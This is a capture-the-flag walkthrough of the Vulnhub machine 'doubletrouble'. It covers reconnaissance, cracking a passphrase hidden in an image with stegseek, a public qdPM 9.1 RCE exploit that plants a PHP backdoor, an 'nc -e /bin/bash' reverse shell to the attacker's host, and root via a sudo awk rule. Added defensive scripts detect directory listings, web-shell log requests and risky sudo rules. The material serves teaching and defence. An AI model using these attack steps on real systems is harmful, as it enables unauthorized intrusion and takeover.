Vulnhub: Doubletrouble Machine Detailed Walkthrough
Doubletrouble
Author: Jason_huawen
Target host basic information
Name: doubletrouble: 1
Address: https://www.vulnhub.com/entry/doubletrouble-1,743/
Identifying the target host IP address
┌──(kali㉿kali)-[~/Vulnhub/Doubletrouble]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.119.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:2b:cc:72 1 60 PCS Systemtechnik GmbH
192.168.56.188 08:00:27:dd:2c:b4 1 60 PCS Systemtechnik GmbH
Using the netdiscover tool that ships with Kali Linux, the target host IP address is identified as 192.168.56.188.
NMAP scan
┌──(kali㉿kali)-[~/Vulnhub/Doubletrouble]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.188 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-18 04:32 EST
Nmap scan report for bogon (192.168.56.188)
Host is up (0.000068s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)
| 256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)
|_ 256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: qdPM | Login
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:DD:2C:B4 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.92 seconds
The NMAP scan shows that the target host has 2 open ports: 22 (SSH) and 80 (HTTP).
Get Access
Since the target host's SSH version (7.9) has no exploitable vulnerability, we start from port 80:
┌──(kali㉿kali)-[~/Vulnhub/Doomsday_Device]
└─$ curl http://192.168.56.188/robots.txt
#User-agent: *
#Disallow:
┌──(kali㉿kali)-[~/Vulnhub/Doomsday_Device]
└─$ gobuster dir -u http://192.168.56.188 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.188
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/18 04:37:28 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 317] [--> http://192.168.56.188/images/]
/uploads (Status: 301) [Size: 318] [--> http://192.168.56.188/uploads/]
/css (Status: 301) [Size: 314] [--> http://192.168.56.188/css/]
/template (Status: 301) [Size: 319] [--> http://192.168.56.188/template/]
/core (Status: 301) [Size: 315] [--> http://192.168.56.188/core/]
/install (Status: 301) [Size: 318] [--> http://192.168.56.188/install/]
/js (Status: 301) [Size: 313] [--> http://192.168.56.188/js/]
/sf (Status: 301) [Size: 313] [--> http://192.168.56.188/sf/]
/secret (Status: 301) [Size: 317] [--> http://192.168.56.188/secret/]
/backups (Status: 301) [Size: 318] [--> http://192.168.56.188/backups/]
/batch (Status: 301) [Size: 316] [--> http://192.168.56.188/batch/]
/server-status (Status: 403) [Size: 279]
Progress: 217305 / 220561 (98.52%)===============================================================
2022/11/18 04:37:57 Finished
===============================================================
Gobuster found quite a few directories; /secret in particular stands out. Let's see what it contains:
┌──(kali㉿kali)-[~/Vulnhub/Doomsday_Device]
└─$ curl http://192.168.56.188/secret/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /secret</title>
</head>
<body>
<h1>Index of /secret</h1>
<table>
<tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
<tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a></td><td> </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/image2.gif" alt="[IMG]"></td><td><a href="doubletrouble.jpg">doubletrouble.jpg</a></td><td align="right">2021-09-11 10:39 </td><td align="right"> 81K</td><td> </td></tr>
<tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.38 (Debian) Server at 192.168.56.188 Port 80</address>
</body></html>
Visiting that directory returns a page containing a link to an image; download the image to Kali Linux:
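The /secret page above is an Apache mod_autoindex directory listing, and the scan also reported /backups and /uploads, which are typically worth the same look. The following script is an added example, not part of the original walkthrough: it parses an autoindex page into its entries and summarises what the directory exposes, so a defender can check which paths on a server leak their contents. The listing embedded below is constructed to mirror the Apache 2.4 layout shown above, with a made-up site-backup.tar.gz added; the function and field names are my own.

```python
"""Parse an Apache mod_autoindex page and report what it exposes.

Added example; the SAMPLE_LISTING below is constructed in the layout of an
Apache 2.4 directory index (the walkthrough's /secret page plus an invented
backup archive).  Feed parse_autoindex() the body of any directory response.
"""
import re
from html.parser import HTMLParser

SAMPLE_LISTING = """<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head><title>Index of /secret</title></head>
 <body>
<h1>Index of /secret</h1>
  <table>
   <tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
   <tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a></td><td>&nbsp;</td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/image2.gif" alt="[IMG]"></td><td><a href="doubletrouble.jpg">doubletrouble.jpg</a></td><td align="right">2021-09-11 10:39  </td><td align="right"> 81K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/compressed.gif" alt="[   ]"></td><td><a href="site-backup.tar.gz">site-backup.tar.gz</a></td><td align="right">2021-09-11 10:40  </td><td align="right">2.3M</td><td>&nbsp;</td></tr>
   <tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.38 (Debian) Server at 192.168.56.188 Port 80</address>
</body></html>
"""

_SIZE_UNITS = {"": 1, "K": 1024, "M": 1024 ** 2, "G": 1024 ** 3}


def size_to_bytes(text):
    """'81K' -> 82944, '2.3M' -> 2411724; '-' (a directory) -> None."""
    m = re.fullmatch(r"(\d+(?:\.\d+)?)([KMG]?)", text.strip())
    if not m:
        return None
    return int(float(m.group(1)) * _SIZE_UNITS[m.group(2)])


class _TableRows(HTMLParser):
    """Collect the text cells and link targets of every <tr> on the page."""

    def __init__(self):
        super().__init__()
        self.title = ""
        self.rows = []          # (cells, hrefs) per table row
        self._in_title = False
        self._row = None        # cells of the row being parsed
        self._hrefs = None      # link targets seen in that row
        self._cell = None       # text of the cell being parsed

    def handle_starttag(self, tag, attrs):
        if tag == "title":
            self._in_title = True
        elif tag == "tr":
            self._row, self._hrefs = [], []
        elif tag in ("td", "th") and self._row is not None:
            self._cell = ""
        elif tag == "a" and self._row is not None:
            href = dict(attrs).get("href")
            if href:
                self._hrefs.append(href)

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False
        elif tag in ("td", "th") and self._cell is not None:
            self._row.append(self._cell)
            self._cell = None
        elif tag == "tr" and self._row is not None:
            self.rows.append((self._row, self._hrefs))
            self._row = self._hrefs = None

    def handle_data(self, data):
        if self._in_title:
            self.title += data
        elif self._cell is not None:
            self._cell += data


def parse_autoindex(html):
    """Return {'path': ..., 'entries': [...]} or None if not a directory index."""
    p = _TableRows()
    p.feed(html)
    title = p.title.strip()
    if not title.startswith("Index of "):
        return None
    entries = []
    for cells, hrefs in p.rows:
        # Entry rows are: icon, name, last-modified, size, description.
        # Header rows only carry sort links (?C=...), rule rows carry none.
        links = [h for h in hrefs if not h.startswith("?")]
        if len(cells) < 4 or not links or cells[1].strip() == "Parent Directory":
            continue
        name = links[0]
        entries.append({
            "name": name,
            "is_dir": name.endswith("/"),
            "modified": cells[2].strip(),
            "size": cells[3].strip(),
            "size_bytes": size_to_bytes(cells[3]),
        })
    return {"path": title[len("Index of "):], "entries": entries}


def summarize(report):
    """Count exposed files/directories and the bytes anyone can download."""
    files = [e for e in report["entries"] if not e["is_dir"]]
    return {
        "path": report["path"],
        "files": len(files),
        "directories": len(report["entries"]) - len(files),
        "total_bytes": sum(e["size_bytes"] or 0 for e in files),
    }


if __name__ == "__main__":
    report = parse_autoindex(SAMPLE_LISTING)
    print(summarize(report))
    for entry in report["entries"]:
        print(f"  {entry['size']:>6}  {entry['modified']}  {entry['name']}")
```

In practice the input is the body of a GET to each directory the scanner reported; a `None` result means the directory does not list itself. The fix on the server side is `Options -Indexes` for the document root (or the affected directory), after which Apache returns 403 instead of the listing. Note that here the exposed file was "only" an image, and it still carried credentials, so any listed file is worth examining rather than only the obviously sensitive extensions.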
┌──(kali㉿kali)-[~/Vulnhub/Doubletrouble]
└─$ steghide extract -sf doubletrouble.jpg
Enter passphrase:
┌──(kali㉿kali)-[~/Vulnhub/Doubletrouble]
└─$ stegseek doubletrouble.jpg /usr/share/wordlists/rockyou.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: "92camaro"
[i] Original filename: "creds.txt".
[i] Extracting to "doubletrouble.jpg.out".
┌──(kali㉿kali)-[~/Vulnhub/Doubletrouble]
└─$ ls
doubletrouble.jpg doubletrouble.jpg.out nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/Doubletrouble]
└─$ cat doubletrouble.jpg.out
otisrush@localhost.com
otis666
After downloading it to Kali Linux, open it with steghide to check for hidden content. It turns out to be passphrase-protected; no matter, crack it with stegseek, which recovers the passphrase and extracts the content hidden in the image.
The content is an email address and a password. Recalling that the page returned on port 80 is a login page, could these be the login username and password? Let's try:
Login succeeds!
┌──(kali㉿kali)-[~/Vulnhub/Doubletrouble]
└─$ searchsploit qdpm
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
qdPM 7 - Arbitrary File upload | php/webapps/19154.py
qdPM 7.0 - Arbitrary '.PHP' File Upload (Metasploit) | php/webapps/21835.rb
qdPM 9.1 - 'cfg[app_app_name]' Persistent Cross-Site Scripting | php/webapps/48486.txt
qdPM 9.1 - 'filter_by' SQL Injection | php/webapps/45767.txt
qdPM 9.1 - 'search[keywords]' Cross-Site Scripting | php/webapps/46399.txt
qdPM 9.1 - 'search_by_extrafields[]' SQL Injection | php/webapps/46387.txt
qdPM 9.1 - 'type' Cross-Site Scripting | php/webapps/46398.txt
qdPM 9.1 - Arbitrary File Upload | php/webapps/48460.txt
qdPM 9.1 - Remote Code Execution | php/webapps/47954.py
qdPM 9.1 - Remote Code Execution (RCE) (Authenticated) | php/webapps/50175.py
qdPM 9.1 - Remote Code Execution (RCE) (Authenticated) (v2) | php/webapps/50944.py
qdPM 9.2 - Cross-site Request Forgery (CSRF) | php/webapps/50854.txt
qdPM 9.2 - Password Exposure (Unauthenticated) | php/webapps/50176.txt
qdPM < 9.1 - Remote Code Execution | multiple/webapps/48146.py
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
This web application has quite a few vulnerabilities, and the target runs version 9.1, so we try the remote code execution exploit:
┌──(kali㉿kali)-[~/Vulnhub/Doubletrouble]
└─$ ls
50854.txt 50944.py doubletrouble.jpg doubletrouble.jpg.out nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/Doubletrouble]
└─$ mv 50944.py exploit.py
┌──(kali㉿kali)-[~/Vulnhub/Doubletrouble]
└─$ cat exploit.py
# Exploit Title: qdPM 9.1 - Remote Code Execution (RCE) (Authenticated)
# Google Dork: intitle:qdPM 9.1. Copyright © 2020 qdpm.net
# Date: 2021-08-03
# Original Exploit Author: Rishal Dwivedi (Loginsoft)
# Original ExploitDB ID: 47954 (https://www.exploit-db.com/exploits/47954)
# Exploit Author: Leon Trappett (thepcn3rd)
# Vendor Homepage: http://qdpm.net/
# Software Link: http://qdpm.net/download-qdpm-free-project-management
# Version: <=1.9.1
# Tested on: Ubuntu Server 20.04 (Python 3.9.2)
# CVE : CVE-2020-7246
# Exploit written in Python 3.9.2
# Tested Environment - Ubuntu Server 20.04 LTS
# Path Traversal + Remote Code Execution
# Exploit modification: RedHatAugust
┌──(kali㉿kali)-[~/Vulnhub/Doubletrouble]
└─$ python exploit.py -url http://192.168.56.188/ -u otisrush@localhost.com -p otis666
You are not able to use the designated admin account because they do not have a myAccount page.
The DateStamp is 2022-11-18 03:47
Backdoor uploaded at - > http://192.168.56.188/uploads/users/466213-backdoor.php?cmd=whoami
It seems the backdoor has been uploaded.
┌──(kali㉿kali)-[~/Vulnhub/Doubletrouble]
└─$ curl http://192.168.56.188/uploads/users/466213-backdoor.php?cmd=whoami
<pre>www-data
</pre>
Command execution works; next, see how to get a shell.
Replace the value of cmd with nc to try to establish a shell:
http://192.168.56.188/uploads/users/466213-backdoor.php?cmd=nc%20-e%20/bin/bash%20192.168.56.137%205555
With this, Kali Linux successfully receives the reverse shell from the target host:
┌──(kali㉿kali)-[~/Vulnhub/Doubletrouble]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.188] 48732
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@doubletrouble:/var/www/html/uploads/users$
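Everything in this step leaves a clear trace in the web server's access log: a PHP file under /uploads/users/ (a directory that should only ever hold avatars) is requested with a `cmd` query parameter. The script below is an added example, not part of the original walkthrough or of qdPM: it runs a detection over Apache combined-format log lines and flags requests that execute a script from an upload directory or carry a command-style parameter. The log lines are constructed; the paths mirror the walkthrough, and the parameter list and function names are my own choices.

```python
"""Flag web-shell style requests in Apache combined-format access logs.

Added example. SAMPLE_LOG is constructed: two ordinary qdPM requests, two
calls to a PHP file that was written into the avatar upload directory, and a
legitimate avatar download that must not be flagged.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

SAMPLE_LOG = """\
192.168.56.137 - - [18/Nov/2022:03:40:12 -0500] "GET / HTTP/1.1" 200 2841 "-" "Mozilla/5.0"
192.168.56.137 - - [18/Nov/2022:03:41:02 -0500] "POST /index.php/myAccount/update HTTP/1.1" 302 0 "-" "python-requests/2.28.1"
192.168.56.137 - - [18/Nov/2022:03:47:30 -0500] "GET /uploads/users/466213-backdoor.php?cmd=whoami HTTP/1.1" 200 23 "-" "curl/7.85.0"
192.168.56.137 - - [18/Nov/2022:03:48:01 -0500] "GET /uploads/users/466213-backdoor.php?cmd=id HTTP/1.1" 200 64 "-" "Mozilla/5.0"
192.168.56.50 - - [18/Nov/2022:03:49:10 -0500] "GET /uploads/users/123456-avatar.png HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# Apache "combined" LogFormat: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Directories that should only ever serve static user content (qdPM avatars
# live under /uploads/users/); a server-side script there is a red flag.
UPLOAD_DIRS = ("/uploads/",)
SCRIPT_SUFFIXES = (".php", ".phtml", ".php3", ".php5", ".phar")
# Parameter names commonly used by simple command shells (assumed list).
COMMAND_PARAMS = {"cmd", "exec", "command", "execute", "shell", "c"}


def parse_line(line):
    """Split one combined-format line into fields, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def inspect_target(target):
    """Return the reasons a request target looks like web-shell use (empty = clean)."""
    reasons = []
    parts = urlsplit(target)
    path = unquote(parts.path).lower()
    if path.startswith(UPLOAD_DIRS) and path.endswith(SCRIPT_SUFFIXES):
        reasons.append("server-side script requested from an upload directory")
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name.lower() in COMMAND_PARAMS:
            reasons.append(f"command-style parameter {name}={values[0]!r}")
    return reasons


def find_webshell_hits(log_text):
    """Scan a log and return the suspicious requests with their reasons."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = inspect_target(rec["target"])
        if reasons:
            hits.append({
                "ip": rec["ip"],
                "ts": rec["ts"],
                "target": rec["target"],
                "status": int(rec["status"]),
                "reasons": reasons,
            })
    return hits


if __name__ == "__main__":
    for hit in find_webshell_hits(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} {hit['status']} {hit['target']}")
        for reason in hit["reasons"]:
            print(f"    - {reason}")
```

Two things follow from the detection. The upload itself happens through an authenticated profile update (the `POST /index.php/myAccount/update` line), so the account that performed it is identifiable from the session, not only from the source IP. And the root cause is that the upload directory is allowed to execute PHP at all; with mod_php, `php_admin_flag engine off` inside a `<Directory>` block for /uploads (or serving that tree from a host with no PHP handler) turns a planted `.php` file into an inert download, which is the fix to pair with the qdPM upgrade.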
Privilege escalation
Start an HTTP server with Python on Kali Linux, upload the linpeas.sh script to the target host's /tmp directory, make it executable, and run it:
www-data@doubletrouble:/var/www/html/install$ cd /tmp
cd /tmp
www-data@doubletrouble:/tmp$ wget http://192.168.56.137:8000/linpeas.sh
wget http://192.168.56.137:8000/linpeas.sh
--2022-11-18 03:55:28-- http://192.168.56.137:8000/linpeas.sh
Connecting to 192.168.56.137:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 827827 (808K) [text/x-sh]
Saving to: 'linpeas.sh'
linpeas.sh 100%[===================>] 808.42K --.-KB/s in 0.006s
2022-11-18 03:55:28 (138 MB/s) - 'linpeas.sh' saved [827827/827827]
www-data@doubletrouble:/tmp$ ls
ls
linpeas.sh
www-data@doubletrouble:/tmp$ chmod +x linpeas.sh
chmod +x linpeas.sh
www-data@doubletrouble:/tmp$ ./linpeas.sh
./linpeas.sh
▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄ ▄▄▄ ▄▄▄▄▄ ▄▄▄
▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄ ▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▀▀▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀
▀▀▀▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▀▀
▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀
/---------------------------------------------------------------------------------\
| Do you like PEASS? |
|---------------------------------------------------------------------------------|
| Get the latest version : https://github.com/sponsors/carlospolop |
| Follow on Twitter : @carlospolopm |
| Respect on HTB : SirBroccoli |
|---------------------------------------------------------------------------------|
| Thank you! |
\---------------------------------------------------------------------------------/
linpeas-ng by carlospolop
(omitted)
Among the linpeas.sh results, this part catches our attention:
╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
Matching Defaults entries for www-data on doubletrouble:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on doubletrouble:
(ALL : ALL) NOPASSWD: /usr/bin/awk
This shows that www-data, the user we currently have, can run awk as root without a password, which makes privilege escalation possible. Looking it up on the GTFOBins site gives the corresponding method, and privilege escalation succeeds:
# id
id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
cd /root
# ls -alh
ls -alh
total 395M
drwx------ 2 root root 4.0K Sep 11 2021 .
drwxr-xr-x 18 root root 4.0K Dec 17 2020 ..
-rw------- 1 root root 46 Sep 11 2021 .bash_history
-rw-r--r-- 1 root root 395M Sep 11 2021 doubletrouble.ova
Privilege escalation succeeded!!!
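The sudoers entry that made this possible is easy to audit for before an attacker finds it: a NOPASSWD rule, for a web service account, on a binary that can spawn a shell, with no fixed arguments. The script below is an added example, not part of the original walkthrough: it parses `sudo -l` output of the form shown in the linpeas section and grades each rule. The sample text is the target's output plus one constructed, deliberately harmless rule for comparison; the list of shell-capable binaries is assumed from well-known GTFOBins entries and the function names are my own.

```python
"""Audit `sudo -l` output for rules that amount to unrestricted root.

Added example. SAMPLE_SUDO_L reproduces the rule found on the target and adds
a constructed second rule with fixed arguments to show the difference.
"""
import os.path
import re

SAMPLE_SUDO_L = """\
Matching Defaults entries for www-data on doubletrouble:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User www-data may run the following commands on doubletrouble:
    (ALL : ALL) NOPASSWD: /usr/bin/awk
    (root) /bin/systemctl restart apache2
"""

# Binaries that can run an arbitrary command or shell when given the right
# arguments (assumed list, drawn from widely documented GTFOBins entries).
SHELL_CAPABLE = {
    "awk", "gawk", "mawk", "bash", "sh", "dash", "env", "find", "less", "more",
    "man", "nano", "perl", "python", "python3", "ruby", "vi", "vim", "zip", "tar",
}

# "(runas) TAG: TAG: /path/cmd args, /path/cmd2"
SUDO_L_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+?)\s*$")


def parse_sudo_l(text):
    """Return one dict per command specification in the 'may run' section."""
    entries = []
    in_commands = False
    for raw in text.splitlines():
        line = raw.strip()
        if "may run the following commands" in line:
            in_commands = True
            continue
        if not in_commands or not line.startswith("("):
            continue
        m = SUDO_L_RE.match(line)
        if not m:
            continue
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        for spec in m.group("cmds").split(","):
            spec = spec.strip()
            if not spec:
                continue
            parts = spec.split(None, 1)
            entries.append({
                "runas": m.group("runas").strip(),
                "nopasswd": "NOPASSWD" in tags,
                "command": parts[0],
                # None means sudoers fixed no arguments, so any are accepted.
                "args": parts[1] if len(parts) > 1 else None,
            })
    return entries


def audit_entry(entry):
    """Grade one rule: 'critical' means it is equivalent to a root shell."""
    findings = []
    binary = os.path.basename(entry["command"])
    runas_user = entry["runas"].split(":")[0].strip()
    as_root = runas_user in ("ALL", "root", "")
    unrestricted = entry["command"] == "ALL"
    shell_escape = binary in SHELL_CAPABLE and entry["args"] is None
    if unrestricted:
        findings.append("any command allowed")
    if shell_escape:
        findings.append(f"{binary} can spawn a shell and accepts arbitrary arguments")
    if entry["nopasswd"]:
        findings.append("NOPASSWD: a compromised account needs no secret to use this")
    if as_root and (unrestricted or shell_escape):
        severity = "critical"
    elif findings:
        severity = "warning"
    else:
        severity = "ok"
    return {"entry": entry, "severity": severity, "findings": findings}


def audit_sudo_l(text):
    return [audit_entry(e) for e in parse_sudo_l(text)]


if __name__ == "__main__":
    for result in audit_sudo_l(SAMPLE_SUDO_L):
        e = result["entry"]
        args = e["args"] or "<any>"
        print(f"[{result['severity']}] ({e['runas']}) {e['command']} {args}")
        for f in result["findings"]:
            print(f"    - {f}")
```

Running the audit on each host's `sudo -l` output (or on /etc/sudoers and /etc/sudoers.d with `visudo -c` for syntax) turns this class of finding into a routine check. The remediation for the rule found here is to delete it; if awk really is needed for one privileged task, the rule should name a wrapper script with fixed arguments, as the constructed second rule illustrates, so the service account cannot supply its own program text.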